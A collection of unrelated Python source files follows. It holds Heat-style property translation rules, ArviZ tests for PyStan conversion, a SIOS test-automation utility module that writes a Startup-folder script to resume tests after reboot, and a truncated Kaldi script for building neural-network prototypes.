ex: input: {'foo': {'Type': 'String'}, 'bar': {'Type': 'Map'}}
output: {'foo': {'Type': 'String'}, 'bar': {'Type': 'Json'}},
{'foo': {'Ref': 'foo'}, 'bar': {'Ref': 'bar'}}
"""
def param_prop_def_items(name, schema, template_type):
if template_type == 'hot':
param_def = cls._hot_param_def_from_prop(schema)
prop_def = cls._hot_prop_def_from_prop(name, schema)
else:
param_def = cls._param_def_from_prop(schema)
prop_def = cls._prop_def_from_prop(name, schema)
return (name, param_def), (name, prop_def)
if not schema:
return {}, {}
param_prop_defs = [param_prop_def_items(n, s, template_type)
for n, s in six.iteritems(schemata(schema))
if s.implemented]
param_items, prop_items = zip(*param_prop_defs)
return dict(param_items), dict(prop_items)
class TranslationRule(object):
"""Translating mechanism one properties to another.
Mechanism uses list of rules, each defines by this class, and can be
executed. Working principe: during resource creating after properties
defining resource take list of rules, specified by method
translation_rules, which should be overloaded for each resource, if it's
needed, and execute each rule using translate_properties method. Next
operations are allowed:
- ADD. This rule allows to add some value to list-type properties. Only
list-type values can be added to such properties. Using for other
cases is prohibited and will be returned with error.
- REPLACE. This rule allows to replace some property value to another. Used
for all types of properties. Note, that if property has list type, then
value will be replaced for all elements of list, where it needed. If
element in such property must be replaced by value of another element of
this property, value_name must be defined.
- DELETE. This rule allows to delete some property. If property has list
type, then deleting affects value in all list elements.
"""
RULE_KEYS = (ADD, REPLACE, DELETE) = ('Add', 'Replace', 'Delete')
def __init__(self, properties, rule, source_path, value=None,
value_name=None, value_path=None):
"""Add new rule for translating mechanism.
:param properties: properties of resource
:param rule: rule from RULE_KEYS
:param source_path: list with path to property, which value will be
affected in rule.
:param value: value which will be involved in rule
:param value_name: value_name which used for replacing properties
inside list-type properties.
:param value_path: path to value, which should be used for translation.
"""
self.properties = properties
self.rule = rule
self.source_path = source_path
self.value = value or None
self.value_name = value_name
self.value_path = value_path
self.validate()
def validate(self):
if self.rule not in self.RULE_KEYS:
raise ValueError(_('There is no rule %(rule)s. List of allowed '
'rules is: %(rules)s.') % {
'rule': self.rule,
'rules': ', '.join(self.RULE_KEYS)})
elif not isinstance(self.properties, Properties):
raise ValueError(_('Properties must be Properties type. '
'Found %s.') % type(self.properties))
elif not isinstance(self.source_path, list):
raise ValueError(_('source_path should be a list with path '
'instead of %s.') % type(self.source_path))
elif len(self.source_path) == 0:
raise ValueError(_('source_path must be non-empty list with '
'path.'))
elif self.value_name and self.rule != self.REPLACE:
raise ValueError(_('Use value_name only for replacing list '
'elements.'))
elif self.rule == self.ADD and not isinstance(self.value, list):
raise ValueError(_('value must be list type when rule is ADD.'))
def execute_rule(self):
(source_key, source_data) = self.get_data_from_source_path(
self.source_path)
if self.value_path:
(value_key, value_data) = self.get_data_from_source_path(
self.value_path)
value = (value_data[value_key]
if value_data and value_data.get(value_key)
else self.value)
else:
(value_key, value_data) = None, None
value = self.value
if (source_data is None or (self.rule != self.DELETE and
(value is None and
self.value_name is None and
(value_data is None or
value_data.get(value_key) is None)))):
return
if self.rule == TranslationRule.ADD:
if isinstance(source_data, list):
source_data.extend(value)
else:
raise ValueError(_('ADD rule must be used only for '
'lists.'))
elif self.rule == TranslationRule.REPLACE:
if isinstance(source_data, list):
for item in source_data:
if item.get(self.value_name) and item.get(source_key):
raise ValueError(_('Cannot use %(key)s and '
'%(name)s at the same time.')
% dict(key=source_key,
name=self.value_name))
elif item.get(self.value_name) is not None:
item[source_key] = item[self.value_name]
del item[self.value_name]
elif value is not None:
item[source_key] = value
else:
if (source_data and source_data.get(source_key) and
value_data and value_data.get(value_key)):
raise ValueError(_('Cannot use %(key)s and '
'%(name)s at the same time.')
% dict(key=source_key,
name=value_key))
source_data[source_key] = value
elif self.rule == TranslationRule.DELETE:
if isinstance(source_data, list):
for item in source_data:
if item.get(source_key) is not None:
del item[source_key]
else:
del source_data[source_key]
def get_data_from_source_path(self, path):
def get_props(props, key):
props = props.get(key)
if props.schema.schema is not None:
keys = list(props.schema.schema)
schemata = dict((k, props.schema.schema[k])
for k in keys)
props = dict((k, Property(s, k))
for k, s in schemata.items())
return props
source_key = path[0]
data = self.properties.data
props = self.properties.props
for key in path:
if isinstance(data, list):
source_key = key
elif data.get(key) is not None and isinstance(data.get(key),
(list, dict)):
data = data.get(key)
props = get_props(props, key)
elif data.get(key) is None:
if (self.rule == TranslationRule.DELETE or
(self.rule == TranslationRule.REPLACE and
self.value_name)):
return None, None
elif props.get(key).type() == Schema.LIST:
data[key] = []
elif props.get(key).type() == Schema.MAP:
data[key] = {}
else:
source_key = key
continue
data = data.get(key)
props = get_props(props, key)
else:
source_key = key
return source_key, data
| |
# pylint: disable=no-member, invalid-name, redefined-outer-name, too-many-function-args
import importlib
from collections import OrderedDict
import numpy as np
import pytest
from ... import from_pystan
from ...data.io_pystan import get_draws, get_draws_stan3 # pylint: disable=unused-import
from ..helpers import ( # pylint: disable=unused-import
chains,
check_multiple_attrs,
draws,
eight_schools_params,
importorskip,
load_cached_models,
pystan_version,
running_on_ci,
)
# Check if either pystan or pystan3 is installed
pystan_installed = (importlib.util.find_spec("pystan") is not None) or (
importlib.util.find_spec("stan") is not None
)
pytestmark = pytest.mark.skipif(
not (pystan_installed | running_on_ci()),
reason="test requires pystan/pystan3 which is not installed",
)
class TestDataPyStan:
@pytest.fixture(scope="class")
def data(self, eight_schools_params, draws, chains):
class Data:
model, obj = load_cached_models(eight_schools_params, draws, chains, "pystan")["pystan"]
return Data
def get_inference_data(self, data, eight_schools_params):
"""vars as str."""
return from_pystan(
posterior=data.obj,
posterior_predictive="y_hat",
predictions="y_hat", # wrong, but fine for testing
prior=data.obj,
prior_predictive="y_hat",
observed_data="y",
constant_data="sigma",
predictions_constant_data="sigma", # wrong, but fine for testing
log_likelihood={"y": "log_lik"},
coords={"school": np.arange(eight_schools_params["J"])},
dims={
"theta": ["school"],
"y": ["school"],
"sigma": ["school"],
"y_hat": ["school"],
"eta": ["school"],
},
posterior_model=data.model,
prior_model=data.model,
)
def get_inference_data2(self, data, eight_schools_params):
"""vars as lists."""
return from_pystan(
posterior=data.obj,
posterior_predictive=["y_hat"],
predictions=["y_hat"], # wrong, but fine for testing
prior=data.obj,
prior_predictive=["y_hat"],
observed_data=["y"],
log_likelihood="log_lik",
coords={
"school": np.arange(eight_schools_params["J"]),
"log_likelihood_dim": np.arange(eight_schools_params["J"]),
},
dims={
"theta": ["school"],
"y": ["school"],
"y_hat": ["school"],
"eta": ["school"],
"log_lik": ["log_likelihood_dim"],
},
posterior_model=data.model,
prior_model=data.model,
)
def get_inference_data3(self, data, eight_schools_params):
"""multiple vars as lists."""
return from_pystan(
posterior=data.obj,
posterior_predictive=["y_hat", "log_lik"], # wrong, but fine for testing
predictions=["y_hat", "log_lik"], # wrong, but fine for testing
prior=data.obj,
prior_predictive=["y_hat", "log_lik"], # wrong, but fine for testing
constant_data=["sigma", "y"], # wrong, but fine for testing
predictions_constant_data=["sigma", "y"], # wrong, but fine for testing
coords={"school": np.arange(eight_schools_params["J"])},
dims={
"theta": ["school"],
"y": ["school"],
"sigma": ["school"],
"y_hat": ["school"],
"eta": ["school"],
},
posterior_model=data.model,
prior_model=data.model,
)
def get_inference_data4(self, data):
"""minimal input."""
return from_pystan(
posterior=data.obj,
posterior_predictive=None,
prior=data.obj,
prior_predictive=None,
coords=None,
dims=None,
posterior_model=data.model,
log_likelihood=[],
prior_model=data.model,
save_warmup=pystan_version() == 2,
)
def get_inference_data5(self, data):
"""minimal input."""
return from_pystan(
posterior=data.obj,
posterior_predictive=None,
prior=data.obj,
prior_predictive=None,
coords=None,
dims=None,
posterior_model=data.model,
log_likelihood=False,
prior_model=data.model,
save_warmup=pystan_version() == 2,
dtypes={"eta": int},
)
def test_sampler_stats(self, data, eight_schools_params):
inference_data = self.get_inference_data(data, eight_schools_params)
test_dict = {"sample_stats": ["diverging"]}
fails = check_multiple_attrs(test_dict, inference_data)
assert not fails
def test_inference_data(self, data, eight_schools_params):
inference_data1 = self.get_inference_data(data, eight_schools_params)
inference_data2 = self.get_inference_data2(data, eight_schools_params)
inference_data3 = self.get_inference_data3(data, eight_schools_params)
inference_data4 = self.get_inference_data4(data)
inference_data5 = self.get_inference_data5(data)
# inference_data 1
test_dict = {
"posterior": ["theta", "~log_lik"],
"posterior_predictive": ["y_hat"],
"predictions": ["y_hat"],
"observed_data": ["y"],
"constant_data": ["sigma"],
"predictions_constant_data": ["sigma"],
"sample_stats": ["diverging", "lp"],
"log_likelihood": ["y", "~log_lik"],
"prior": ["theta"],
}
fails = check_multiple_attrs(test_dict, inference_data1)
assert not fails
# inference_data 2
test_dict = {
"posterior_predictive": ["y_hat"],
"predictions": ["y_hat"],
"observed_data": ["y"],
"sample_stats_prior": ["diverging"],
"sample_stats": ["diverging", "lp"],
"log_likelihood": ["log_lik"],
"prior_predictive": ["y_hat"],
}
fails = check_multiple_attrs(test_dict, inference_data2)
assert not fails
assert any(
item in inference_data2.posterior.attrs for item in ["stan_code", "program_code"]
)
assert any(
item in inference_data2.sample_stats.attrs for item in ["stan_code", "program_code"]
)
# inference_data 3
test_dict = {
"posterior_predictive": ["y_hat", "log_lik"],
"predictions": ["y_hat", "log_lik"],
"constant_data": ["sigma", "y"],
"predictions_constant_data": ["sigma", "y"],
"sample_stats_prior": ["diverging"],
"sample_stats": ["diverging", "lp"],
"log_likelihood": ["log_lik"],
"prior_predictive": ["y_hat", "log_lik"],
}
fails = check_multiple_attrs(test_dict, inference_data3)
assert not fails
# inference_data 4
test_dict = {
"posterior": ["theta"],
"prior": ["theta"],
"sample_stats": ["diverging", "lp"],
"~log_likelihood": [""],
}
if pystan_version() == 2:
test_dict.update(
{"warmup_posterior": ["theta"], "warmup_sample_stats": ["diverging", "lp"]}
)
fails = check_multiple_attrs(test_dict, inference_data4)
assert not fails
# inference_data 5
test_dict = {
"posterior": ["theta"],
"prior": ["theta"],
"sample_stats": ["diverging", "lp"],
"~log_likelihood": [""],
}
if pystan_version() == 2:
test_dict.update(
{"warmup_posterior": ["theta"], "warmup_sample_stats": ["diverging", "lp"]}
)
fails = check_multiple_attrs(test_dict, inference_data5)
assert not fails
assert inference_data5.posterior.eta.dtype.kind == "i"
def test_invalid_fit(self, data):
if pystan_version() == 2:
model = data.model
model_data = {
"J": 8,
"y": np.array([28.0, 8.0, -3.0, 7.0, -1.0, 1.0, 18.0, 12.0]),
"sigma": np.array([15.0, 10.0, 16.0, 11.0, 9.0, 11.0, 10.0, 18.0]),
}
fit_test_grad = model.sampling(
data=model_data, test_grad=True, check_hmc_diagnostics=False
)
with pytest.raises(AttributeError):
_ = from_pystan(posterior=fit_test_grad)
fit = model.sampling(data=model_data, iter=100, chains=1, check_hmc_diagnostics=False)
del fit.sim["samples"]
with pytest.raises(AttributeError):
_ = from_pystan(posterior=fit)
def test_empty_parameter(self):
model_code = """
parameters {
real y;
vector[3] x;
vector[0] a;
vector[2] z;
}
model {
y ~ normal(0,1);
}
"""
if pystan_version() == 2:
from pystan import StanModel # pylint: disable=import-error
model = StanModel(model_code=model_code)
fit = model.sampling(iter=500, chains=2, check_hmc_diagnostics=False)
else:
import stan # pylint: disable=import-error
model = stan.build(model_code)
fit = model.sample(num_samples=500, num_chains=2)
posterior = from_pystan(posterior=fit)
test_dict = {"posterior": ["y", "x", "z", "~a"], "sample_stats": ["diverging"]}
fails = check_multiple_attrs(test_dict, posterior)
assert not fails
def test_get_draws(self, data):
fit = data.obj
if pystan_version() == 2:
draws, _ = get_draws(fit, variables=["theta", "theta"])
assert draws.get("theta") is not None
else:
draws = get_draws_stan3(fit, variables=["theta", "theta"])
assert draws.get("theta") is not None
@pytest.mark.skipif(pystan_version() != 2, reason="PyStan 2.x required")
def test_index_order(self, data, eight_schools_params):
"""Test 0-indexed data."""
# Skip test if pystan not installed
pystan = importorskip("pystan") # pylint: disable=import-error
fit = data.model.sampling(data=eight_schools_params)
if pystan.__version__ >= "2.18":
# make 1-indexed to 0-indexed
for holder in fit.sim["samples"]:
new_chains = OrderedDict()
for i, (key, values) in enumerate(holder.chains.items()):
if "[" in key:
name, *shape = key.replace("]", "").split("[")
shape = [str(int(item) - 1) for items in shape for item in items.split(",")]
key = name + f"[{','.join(shape)}]"
new_chains[key] = np.full_like(values, fill_value=float(i))
setattr(holder, "chains", new_chains)
fit.sim["fnames_oi"] = list(fit.sim["samples"][0].chains.keys())
idata = from_pystan(posterior=fit)
assert idata is not None
for j, fpar in enumerate(fit.sim["fnames_oi"]):
par, *shape = fpar.replace("]", "").split("[")
if par in {"lp__", "log_lik"}:
continue
assert hasattr(idata.posterior, par), (par, list(idata.posterior.data_vars))
if shape:
shape = [slice(None), slice(None)] + list(map(int, shape))
assert idata.posterior[par][tuple(shape)].values.mean() == float(j)
else:
assert idata.posterior[par].values.mean() == float(j)
| |
#-------------------------------------------------------------------------------
# Name: dkutils.py
#-------------------------------------------------------------------------------
from __future__ import with_statement
__author__ = "Travis Goldie"
__email__ = "test_automation@us.sios.com"
__date__ = "11/14/12"
__copyright__ = "(c) SIOS Technology Corp 2012"
import collections
import hashlib
import imp
import inspect
import itertools
import logging
import os
import re
import subprocess
import sys
from copy import deepcopy
#The try statement is needed when using different versions of Python.
#For Example using both Cpython 3.2 and IronPython 2.7
try:
from configparser import ConfigParser, ExtendedInterpolation
import ast
except ImportError:
from ConfigParser import ConfigParser
import _ast as ast
#-------------------------------------------------------------------------------
# Internal Utils
#-------------------------------------------------------------------------------
def cleanValue(val):
"""
Purpose:
Cleans input. Removes single/double quotes and extra whitespace. Val can
be more than one parameter.
"""
if not val:
return val
val = val.strip().strip('"').strip("'")
return val
def cleanAsType(val):
"""
Purpose:
Cleans input with cleanValue and runs ast.literal_eval(). This returns
val as its deduced data type (int, float) or as a string. If val is an
int or float, it will be returned as is.
"""
try:
val = cleanValue(val)
return ast.literal_eval(val) #Return as its deduced type.
except (ValueError, SyntaxError):
return val #Return as a string
except AttributeError:
#This occurs when trying to use cleanValue on a non-str object
return val
def doOnNodes(config, funcObj, expectedRetCode, message, hostnames):
"""
Purpose:
Generic wrapper for functions that run on some or all nodes.
Expects for funcObj to be a partial function (see functools.partial()),
with the last argument being the node to run on
"""
resultDict = {}
#Create a list of hostnames from the string
if hostnames is not None:
#hostnames can be either a list or a delimited string
if isinstance(hostnames, str):
hostnameList = config.splitAndLower(hostnames)
else:
hostnameList = config.splitAndLower(hostnames[0])
else:
hostnameList = config.allHostnamesFromNodes
#Execute the "do" function on each of the given nodes.
for hostname in hostnameList:
#If a Node has no hostname, just pass over it.
if hostname.startswith("node"):
continue
resultDict[hostname] = funcObj(hostname)
config.logger.debug("Function {}, ResultDict {}".
format(funcObj.__name__, resultDict))
if any(resultDict[key] != expectedRetCode for key in resultDict.keys()):
config.logger.warning(message)
return False
else:
return expectedRetCode
def isModule(path):
"""
Purpose:
Check to see if the file can be imported as a python module
"""
if not os.path.exists(path):
return False
try:
moduleName = os.path.basename(path)
imp.load_source(moduleName, path)
return True
except ImportError:
return False
except SyntaxError:
return False
def md5sum(obj):
"""
Purpose:
Used to test hashs of object. Returns the hash string of "obj"
"""
return hashlib.md5(obj).hexdigest()
def md5File(pathToFile, blocksize=2**16):
"""
Purpose:
Finds the md5 hash of a file. If file does not exist, will return None
"""
return _hashFile(hashlib.md5(), pathToFile, blocksize)
def sha1File(pathToFile, blocksize=2**16):
"""
Purpose:
Finds the sha1 hash of a file. If file does not exist, will return None
"""
return _hashFile(hashlib.sha1(), pathToFile, blocksize)
def _hashFile(hashFunc, pathToFile, blocksize=2**16):
"""
Purpose:
Finds the hash of a file. If file does not exist, will return None
"""
if not os.path.exists(pathToFile):
return None
with open(pathToFile, 'rb') as file:
while True:
data = file.read(blocksize)
if not data:
break
hashFunc.update(data)
#Reading is complete
return hashFunc.hexdigest()
def netHelp(retCode):
"""
Purpose:
Runs "net helpmsg" and returns the help message. Useful for debug msgs.
"""
params = ["net", "helpmsg", "{}".format(retCode)]
try:
output = subprocess.check_output(params, stderr=subprocess.STDOUT)
return output
except subprocess.CalledProcessError:
return "Net help failed"
def normjoin(*paths):
"""
Purpose:
Uses os.path functions to normalize and join paths. Returns the
normalized and joined string. Returns None if paths is None.
Parameter
*paths all the paths you want to join
"""
if any(not cleanValue(path) for path in paths):
return None
pathsToJoin = []
for path in paths:
#Clean the values. No leading slashes for each element
path = cleanValue(path)
if len(pathsToJoin) >= 1 and path[0] in ["/", "\\"]:
path = path[1:]
pathsToJoin.append(os.path.normpath(
os.path.expandvars(
os.path.expanduser(path))))
#Note that the * will send the list as arguments to the join function
#Can also use the apply() function
return os.path.join(*pathsToJoin)
def buildTempConfigFromStr(pathToTmpFile, configString, overrides={}):
"""
"""
tmpConfig = ConfigParser(allow_no_value = True,
interpolation=ExtendedInterpolation())
tmpConfig.read_string(configString)
buildTempConfig(pathToTmpFile, tmpConfig, overrides)
def buildTempConfigFromFile(pathToTmpFile, configPaths, overrides={}):
"""
Purpose:
Output the results of ExtendedInterpolation to a file. If multiple
configparsers are passed in they will be written to the same file.
"""
tmpConfig = ConfigParser(allow_no_value = True,
interpolation=ExtendedInterpolation())
for path in configPaths:
tmpConfig.read(path)
buildTempConfig(pathToTmpFile, tmpConfig, overrides)
def buildTempConfig(pathToTmpFile, tmpConfig, overrides):
"""
Purpose:
Output the results of ExtendedInterpolation to a file. If multiple
configparsers are passed in they will be written to the same file.
Useful for anything that uses older versions of Python.
Overrides are a dictionary used to replace values before Interpolation.
Needs to be in the same form as "read_dict()":
{' Section' : { 'Option' : 'Value' } }
"""
tmpConfigDict = {}
if len(overrides) > 0:
tmpConfig.read_dict(overrides)
#Iterate over options and use "get()" to execute the Interpolation
for sec in tmpConfig.sections():
tmpConfigDict[sec] = {}
for opt, _ in tmpConfig[sec].items():
tmpConfigDict[sec][opt] = cleanValue(tmpConfig.get(sec, opt))
#Finished getting values. Write the dict to the configparser
tmpConfig.read_dict(tmpConfigDict)
#Check if directory of "pathToTmpFile" exists. If not create it.
tmpFileBasepath = os.path.dirname(pathToTmpFile)
if not os.path.exists(tmpFileBasepath):
os.mkdir(tmpFileBasepath)
#Open the file handle and close it when done
with open(pathToTmpFile, 'w') as fp:
tmpConfig.write(fp, space_around_delimiters=False)
del tmpConfig
def runTestsStartupScript(config, testSuiteName):
"""
Purpose:
Create startup bat
"""
scriptName = "runtests-" + testSuiteName + ".ps1"
startupDir = normjoin("~", r"AppData\Roaming\Microsoft\Windows"
"\Start Menu\Programs\Startup")
scriptPath = normjoin(startupDir, scriptName)
runTestPath = normjoin(config.paths["basedir"], "runtests.py")
#This script will, start the test, spawn a new powershell session that will
#delete itself, and then exit. The replace()'s make the paths safe for
#windows. That is escape the spaces.
scriptContent = """
echo "Starting test suite {name} after reboot."
start-process {pypath} -ArgumentList "{runtest} {name}" -PassThru
start-process powershell.exe -ArgumentList "sleep 3 ; rm {flagfile}" -PassThru
""".format(name=testSuiteName,
pypath=sys.executable.replace(" ", "` "),
flagfile=scriptPath.replace(" ", "` "),
runtest=runTestPath.replace(" ","` "))
if not os.path.exists(startupDir):
os.mkdir(startupDir)
with open(scriptPath, 'w') as scriptFP:
scriptFP.write(scriptContent)
return scriptPath
#-------------------------------------------------------------------------------
# Unused Utils - kept for reference
#-------------------------------------------------------------------------------
def getTargetSystem(node):
"""
Purpose:
Tries to figure what to use as the "target". Tries each of the following,
which ever works first is returned: Hostname, Pulbic IP, Private IP
"""
#Try to find one that is not None
if not node.props["hostname"]:
return node.props["hostname"]
if not node.props["publicip"]:
return node.props["publicip"]
if not node.props["privateip"]:
return node.props["privateip"]
#Default now to "." since we do not have a given target
return "."
def getExternalHostIP():
"""
Purpose:
Get the host's IP. Uses a connection to UDP connection to a socket
to get the socket's name.
"""
import socket
localSocket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
hostname = socket.gethostname()
try:
#Uses port 9,the RFC863 UDP discard port
localSocket.connect((hostname, 9))
hostip = localSocket.getsockname()[0]
except socket.error:
pass
finally:
del localSocket
return hostip
def getStaticHostIP():
"""
Purpose:
Get the IP address of the first interface. This should be the 172.17.*
address.
"""
import socket
ipAddrs = socket.gethostbyname_ex(socket.gethostname())[2]
return ipAddrs[0]
def buildPackage(_file, _excludeList):
"""
Gets the list of modules for __all__ for the __init__.py files
Parameters:
_file Name of module (typically the __name__ list)
_excludeList Dirs or modules you do not want to import
Returns:
list of all modules in directory
"""
packageList = []
#Appends additional values to the default exclude list
_excludeList.extend(['__init__.py', '__pycache__'])
#splits _file to get the last part which is the current dir
_cwd = os.path.dirname(_file)
try:
for mod in os.listdir(_cwd):
if os.path.basename(mod) in _excludeList:
continue
if os.path.isdir(mod) or os.path.splitext(mod)[1] == ".py":
mod = os.path.basename(mod)
packageList.append(os.path.splitext(mod)[0])
except:
return
return packageList
if __name__ == '__main__':
from dkconfig import dkconfig
config = dkconfig(r"c:\Programs\dk_test\scenarios\cluster.ini",
r"c:\Programs\dk_test\scenarios\constants.ini")
#### runTestFromIni(config, "createmirror",
#### r"c:\Programs\dk_test\scenarios\emcmdapi\create\emcmd_createmirror.ini")
## config.runEnvSetup()
## import winfuncs
## import functools
## delJobsFromNode = functools.partial(winfuncs.deletealljobsfromnode, config)
## delJobsFromNode.__name__ = "del"
## doOnNodes(config, delJobsFromNode, 0, "dfd", "cae-qa-v83")
## cmd = ['C:\\Program Files (x86)\\Steeleye\\DataKeeper\\emcmd.exe',
## '172.17.105.148',
## 'CREATEJOB',
## 'switchover-job',
## 'test',
## 'cae-qa-v82.qagroup.com',
## 'E',
## '0.0.0.0',
## 'cae-qa-v83.qagroup.com',
## 'E',
## '0.0.0.0',
## 'D',
## 'cae-qa-v82.qagroup.com',
## 'E',
## '172.17.105.148',
## 'cae-qa-v84.qagroup.com',
## 'E',
## '172.17.105.150',
## 's',
## 'cae-qa-v83.qagroup.com',
## 'E',
## '172.17.105.149',
## 'cae-qa-v84.qagroup.com', 'E', '172.17.105.150', 's']
## subprocess.check_call(cmd)
runTestsStartupScript(config, "blah")
pass
| |
#!/usr/bin/python
# Copyright 2014 Brno University of Technology (author: Karel Vesely)
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# THIS CODE IS PROVIDED *AS IS* BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, EITHER EXPRESS OR IMPLIED, INCLUDING WITHOUT LIMITATION ANY IMPLIED
# WARRANTIES OR CONDITIONS OF TITLE, FITNESS FOR A PARTICULAR PURPOSE,
# MERCHANTABLITY OR NON-INFRINGEMENT.
# See the Apache 2 License for the specific language governing permissions and
# limitations under the License.
# Generated Nnet prototype, to be initialized by 'nnet-initialize'.
import math, random, sys
from optparse import OptionParser
###
### Parse options
###
usage="%prog [options] <feat-dim> <num-leaves> <num-hidden-layers> <num-hidden-neurons> >nnet-proto-file"
parser = OptionParser(usage)
parser.add_option('--no-softmax', dest='with_softmax',
help='Do not put <SoftMax> in the prototype [default: %default]',
default=True, action='store_false');
parser.add_option('--activation-type', dest='activation_type',
help='Select type of activation function : (<Sigmoid>|<Tanh>) [default: %default]',
default='<Sigmoid>', type='string');
parser.add_option('--hid-bias-mean', dest='hid_bias_mean',
help='Set bias for hidden activations [default: %default]',
default=-2.0, type='float');
parser.add_option('--hid-bias-range', dest='hid_bias_range',
help='Set bias range for hidden activations (+/- 1/2 range around mean) [default: %default]',
default=4.0, type='float');
parser.add_option('--param-stddev-factor', dest='param_stddev_factor',
help='Factor to rescale Normal distriburtion for initalizing weight matrices [default: %default]',
default=0.1, type='float');
parser.add_option('--bottleneck-dim', dest='bottleneck_dim',
help='Make bottleneck network with desired bn-dim (0 = no bottleneck) [default: %default]',
default=0, type='int');
parser.add_option('--no-glorot-scaled-stddev', dest='with_glorot', help='Generate normalized weights according to X.Glorot paper, but mapping U->N with same variance (factor sqrt(x/(dim_in+dim_out)))', action='store_false', default=True)
parser.add_option('--no-smaller-input-weights', dest='smaller_input_weights',
help='Disable 1/12 reduction of stddef in input layer [default: %default]',
action='store_false', default=True);
parser.add_option('--num-filters1', dest='num_filters1',
help='Number of filters in first convolutional layer [default: %default]',
default=128, type='int')
parser.add_option('--num-filters2', dest='num_filters2',
help='Number of filters in second convolutional layer [default: %default]',
default=256, type='int')
parser.add_option('--pool-size', dest='pool_size',
help='Size of pooling [default: %default]',
default=3, type='int')
parser.add_option('--pool-step', dest='pool_step',
help='Step of pooling [default: %default]',
default=3, type='int')
parser.add_option('--pool-type', dest='pool_type',
help='Type of pooling (Max || Average) [default: %default]',
default='Max', type='string')
parser.add_option('--pitch-dim', dest='pitch_dim',
help='Number of features representing pitch [default: %default]',
default=0, type='int')
parser.add_option('--delta-order', dest='delta_order',
help='Order of delta features [default: %default]',
default=2, type='int')
parser.add_option('--splice', dest='splice',
help='Length of splice [default: %default]',
default=5,type='int')
parser.add_option('--patch-step1', dest='patch_step1',
help='Patch step of first convolutional layer [default: %default]',
default=1, type='int')
parser.add_option('--patch-dim1', dest='patch_dim1',
help='Lenght of patch of first convolutional layer [default: %default]',
default=9, type='int')
parser.add_option('--dir', dest='dirct',
help='Directory, where network prototypes will be saved [default: %default]',
default='.', type='string')
parser.add_option('--num-pitch-neurons', dest='num_pitch_neurons',
help='Number of neurons in layers processing pitch features [default: %default]',
default='200', type='int')
(o,args) = parser.parse_args()
if len(args) != 4 :
parser.print_help()
sys.exit(1)
(feat_dim, num_leaves, num_hid_layers, num_hid_neurons) = map(int,args);
### End parse options
feat_raw_dim = feat_dim / (o.delta_order+1) / (o.splice*2+1) - o.pitch_dim # we need number of feats without deltas and splice and pitch
# Check
assert(feat_dim > 0)
assert(num_leaves > 0)
assert(num_hid_layers >= 0)
assert(num_hid_neurons > 0)
assert(o.pool_type == 'Max' or o.pool_type == 'Average')
# Optionaly scale
def Glorot(dim1, dim2):
if o.with_glorot:
# 35.0 = magic number, gives ~1.0 in inner layers for hid-dim 1024dim,
return 35.0 * math.sqrt(2.0/(dim1+dim2));
else:
return 1.0
###
### Print prototype of the network
###
# Begin the prototype
print "<NnetProto>"
# Convolutional part of network
num_patch1 = 1 + (feat_raw_dim - o.patch_dim1) / o.patch_step1
num_pool = 1 + (num_patch1 - o.pool_size) / o.pool_step
patch_dim2 = 4 * o.num_filters1
patch_step2 = o.num_filters1
patch_stride2 = num_pool * o.num_filters1
num_patch2 = 1 + (num_pool * o.num_filters1 - patch_dim2) / patch_step2
convolution_proto = ''
convolution_proto += "<ConvolutionalComponent> <InputDim> %d <OutputDim> %d <PatchDim> %d <PatchStep> %d <PatchStride> %d <BiasMean> %f <BiasRange> %f <ParamStddev> %f\n" % \
(feat_raw_dim * (o.delta_order+1) * (o.splice*2+1), o.num_filters1 * num_patch1, o.patch_dim1, o.patch_step1, feat_raw_dim, 0.0, 0.0, 0.01)
convolution_proto += "<%sPoolingComponent> <InputDim> %d <OutputDim> %d <PoolSize> %d <PoolStep> %d <PoolStride> %d\n" % \
(o.pool_type, o.num_filters1*num_patch1, o.num_filters1*num_pool, o.pool_size, o.pool_step, o.num_filters1)
convolution_proto += "<Rescale> <InputDim> %d <OutputDim> %d <InitParam> %f\n" % \
(o.num_filters1*num_pool, o.num_filters1*num_pool, 1.0)
convolution_proto += "<AddShift> <InputDim> %d <OutputDim> %d <InitParam> %f\n" % \
(o.num_filters1*num_pool, o.num_filters1*num_pool, 0.0)
convolution_proto += "%s <InputDim> %d <OutputDim> %d\n" % \
(o.activation_type, o.num_filters1*num_pool, o.num_filters1*num_pool)
convolution_proto += "<ConvolutionalComponent> <InputDim> %d <OutputDim> %d <PatchDim> %d <PatchStep> %d <PatchStride> %d <BiasMean> %f <BiasRange> %f <ParamStddev> %f\n" % \
(o.num_filters1*num_pool, o.num_filters2*num_patch2, patch_dim2, patch_step2, patch_stride2, -2.0, 4.0, 0.1)
convolution_proto += "<Rescale> <InputDim> %d <OutputDim> %d <InitParam> %f\n" % \
(o.num_filters2 * num_patch2, o.num_filters2*num_patch2, 1.0)
convolution_proto += "<AddShift> <InputDim> %d <OutputDim> %d <InitParam> %f\n" % \
(o.num_filters2*num_patch2, o.num_filters2*num_patch2, 0.0)
convolution_proto += "%s <InputDim> %d <OutputDim> %d\n" % \
(o.activation_type, o.num_filters2*num_patch2, o.num_filters2*num_patch2)
if (o.pitch_dim > 0):
# convolutional part
f_conv = open('%s/nnet.proto.convolution' % o.dirct, 'w')
f_conv.write('<NnetProto>\n')
f_conv.write(convolution_proto)
f_conv.write('</NnetProto>\n')
f_conv.close()
# pitch part
f_pitch = open('%s/nnet.proto.pitch' % o.dirct, 'w')
f_pitch.write('<NnetProto>\n')
f_pitch.write('<AffineTransform> <InputDim> %d <OutputDim> %d <BiasMean> %f <BiasRange> %f <ParamStddev> %f\n' % \
((o.pitch_dim * (o.delta_order+1) * (o.splice*2+1)), o.num_pitch_neurons, -2.0, 4.0, 0.109375))
f_pitch.write('%s <InputDim> %d <OutputDim> %d\n' % \
(o.activation_type, o.num_pitch_neurons, o.num_pitch_neurons))
f_pitch.write('<AffineTransform> <InputDim> %d <OutputDim> %d <BiasMean> %f <BiasRange> %f <ParamStddev> %f\n' % \
(o.num_pitch_neurons, o.num_pitch_neurons, -2.0, 4.0, 0.109375))
f_pitch.write('%s <InputDim> %d <OutputDim> %d\n' % \
(o.activation_type, o.num_pitch_neurons, o.num_pitch_neurons))
f_pitch.write('</NnetProto>\n')
f_pitch.close()
# paralell part
vector = ''
for i in range(1, (feat_raw_dim + o.pitch_dim) * (o.delta_order+1) * (o.splice*2+1), feat_raw_dim + o.pitch_dim):
vector += '%d:1:%d ' % (i, i + feat_raw_dim - 1)
